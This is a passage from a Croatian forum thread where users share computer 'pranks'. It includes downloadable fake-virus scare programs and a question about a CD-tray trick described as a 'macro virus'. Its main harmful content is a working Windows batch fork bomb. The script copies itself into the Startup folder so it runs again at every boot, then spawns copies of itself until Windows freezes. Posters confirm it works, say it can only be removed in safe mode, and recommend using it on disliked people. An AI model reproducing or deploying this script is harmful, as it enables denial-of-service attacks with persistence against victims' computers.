Testiran,,,odlicno ga je napravio..Ako on zeli nek kaze sta je napravio..To je to od mene,,bravo xZero
Vaši prankovi (šale) i hackovi
- poruka: 1.070
- |
- čitano: 259.222
- |
- moderatori:
DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
- +/- sve poruke
- ravni prikaz
- starije poruke gore
Moze li se napravit onaj trik sa otvaranjem i zatvaranjem cd pogona da se pokrne čim se neki program pokreće (macro virus)???
Testiran,,,odlicno ga je napravio..Ako on zeli nek kaze sta je napravio..To je to od mene,,bravo xZero
Kakav je to prank? Malo sam izvan dogadjaja.
Otvoris prank i prank ti otvori Notepad i pise nesto tipa "Hai,I'm xZero I will hack you" i onda it u pozadini error da ce ti se bios resetirat i da ti je neki win32 virus i slicno uslo i tak..Zgodno je to sam kaj ja error nisam skuzio jer mi je u pozadini bio LOL
Otvoris prank i prank ti otvori Notepad i pise nesto tipa "Hai,I'm xZero I will hack you" i onda it u pozadini error da ce ti se bios resetirat i da ti je neki win32 virus i slicno uslo i tak..Zgodno je to sam kaj ja error nisam skuzio jer mi je u pozadini bio LOL
ne kuzim... samo to napisem ili... kak cu spremit kao .vbs ili? sry al malo bolje pojasni
Pitaj xZero-u on ti je autor pranka ne ja,ja sam samo tester
Datoteke imaju formate (e.g. postoje JPEG i Bitmap slike), a da bi ih raspoznao, koriste se "extenzije" - nekoliko-slovne "riječi" koje se dodaju na naziv.
E pa, kad napišeš nešto u notepadu, po defaultu se savea u .TXT format. Text.
.vbs označava VBScript datoteku. Sam format je identičan txtu, ali kad aktiviraš datoteku otvorit će ju Windowsov Script Host, a ne notepad. To se naravno da promijeniti...
Ugl., ako želiš spremiti u vbs "formatu", idi u file->save as. Odaberi pod tip datoteke all files, i na naziv datoteke dodaj .vbs. Npr., nazovi ju "Moja skripta.vbs"
Moze li se napravit onaj trik sa otvaranjem i zatvaranjem cd pogona da se pokrene čim se neki program pokreće (macro virus)???
Moze li se napravit onaj trik sa otvaranjem i zatvaranjem cd pogona da se pokrene čim se neki program pokreće (macro virus)???
sve se moze ako znas kako.
e, to i mene zanima :)
prije sam neko vrijeme pokušavao napraviti tu skriptu, ili ju barem nać na internetu, ali bez uspjeha...pa, ako neko zna kako se to radi, nek posta :D
Moze li se napravit onaj trik sa otvaranjem i zatvaranjem cd pogona da se pokrne čim se neki program pokreće (macro virus)???
Moze :D
Evo pa ga skinite testirajte i postajte komentare Skinite ga OVDJE
EDIT: Ako imate koji prijedlog u vezi njega da ubacim sta jos da radi postajte
EDIT1: Ajte komentari plz... Vidim da vas je 6 skinulo prank a niko da posta komentar...
EDIT1: Ajte komentari plz... Vidim da vas je 6 skinulo prank a niko da posta komentar...
HEH mozda sam bas ja skino 4 puta iz zezancijeSalim se,,,btw odlican prank kak sam reko,vrijedi skinuti.
aaaaaaaa,oće li ova tema ozivjeti?!?!??!?
HEH mozda sam bas ja skino 4 puta iz zezancijeSalim se,,,btw odlican prank kak sam reko,vrijedi skinuti.
i ja sam skinuo.....imam osjecaj ko da mu nesto fali..trebalo bi nadodati da se nesto kompu događa da se gasi il restarta otvara ladica ili slicno
aaaaaaaa,oće li ova tema ozivjeti?!?!??!?
aaaaaaaaa, nece? xD sala pa ti ju ozivljavas svakih 15 min. :D
xZero u cemu si ti napravio taj prank
Ako vam ovi prankovi nisu dovoljni onda neznam koji jesu.
jel ima tu ista opasno po zivot il samo zezancije?
Drago mi je što se ovako puno posta u mojoj temi ! Btw.odlični su vam prankovi:Btw 2: trik za otvaranje/zatvaranje ladice potražite na stranicama od prije(u ovoj temi).
A ubacit cu ja jos toga pa staviti link do nove verzije
PS: Radjen je u kombinaciji: BATCH,VBS,C#
Ako vam ovi prankovi nisu dovoljni onda neznam koji jesu.
jel ima tu ista opasno po zivot il samo zezancije?
Kolko sam ja vidio nema ništa opasno.
Uostalom piše ti ispod svakog koda šta radi...
Evo da vam oživim malo temu. Inače, ovo nije moja ideja, samo sam pokupio par ideja i spojio ih u skriptu.
Ideju za kopiranje u startup mi je dao forumaš jedan.
@echo off
copy skripta.bat "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\skripta.bat
:top
start skripta.bat
goto top
Dakle, što radi?
echo sakriva poruke, to valjda svi znaju.
copy kopira ovu skriptu u startup folder tako da se prilikom pokretanja računala skripta ponovo izvrši
Ovo dalje je jasno. Skripta pokreće sama sebe, te skripte dalje počnu pokretat same sebe te tako u nedogled,
dok se ne popuni memorija i (u većini slučaja) smrznu Windowsi. Ovo se još zove i fork bombing.
Da se odmah ogradim, ne odgovaram za posljedice. Ovoga se može riješiti jedino iz safe modea.
Ali, možete i dodati da se naredba start pokrene nakon nekog izvjesnog vremena, tako da ako sami isprobavate
imate vremena izbrisati ju iz starup foldera. Uglavnom, ovo napravite samo nekomu koga zaista ne volite.
Evo da vam oživim malo temu. Inače, ovo nije moja ideja, samo sam pokupio par ideja i spojio ih u skriptu.
@echo off
copy skripta.bat "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\skripta.bat
start skripta.bat
goto top
Siguran da ovo radi kako je zamišljeno?
S obzirom da se događa beskonačna rekurzija, mislim da goto nema smisla. Ustvari, to ovisi o tome čeka li skripta završetak drugog programa. Čeka li?
@echo off
start skripta.bat
goto top
S obzirom da se događa beskonačna rekurzija, mislim da goto nema smisla. Ustvari, to ovisi o tome čeka li skripta završetak drugog programa. Čeka li?
Provjereno radi kako je zamišljeno...
@echo off
start skripta.bat
goto top
Vjeruj mi, radi. Što se tiče goto, mislim da imaš pravo, al nisam o tome u tom trenu razmišljao pa sam goto stavio instinktivno.
Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top
Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top
Jedino me muči delay. Jel možda imaš kakvu ideju osim ping naredbe?
Kolko ja znam nije implementirana naredba wait, niti sleep ili slično, a choice mi baš ne šljaka (ili negdje griješim?).
Uh, vjerojatno bi najlakše bilo neku petlju implementirati, koja bi se ponavljala x puta. Ali to je prilično loše jer tako može odgoditi na 10sek ili na 1h, ovisi o kompu.
Alternativno, mogao bi kompajlati jednostavan program koji poziva WinAPIevu funkciju za sleep... manje od 10 linija u C++u. Ili možda iz samog batcha nekako ju pozvati (neznam koliko se toga može iz batcha, možda je čak i moguće - ako je, to je najbolje rješenje)
"OVDE UKUCAJTE VAŠE IME".homo.com
npr. Marko-markovic.homo.com možete i Marko.markovic.homo.com (točka prestavlja space)
Pokrenite u browseru i... uživajte =D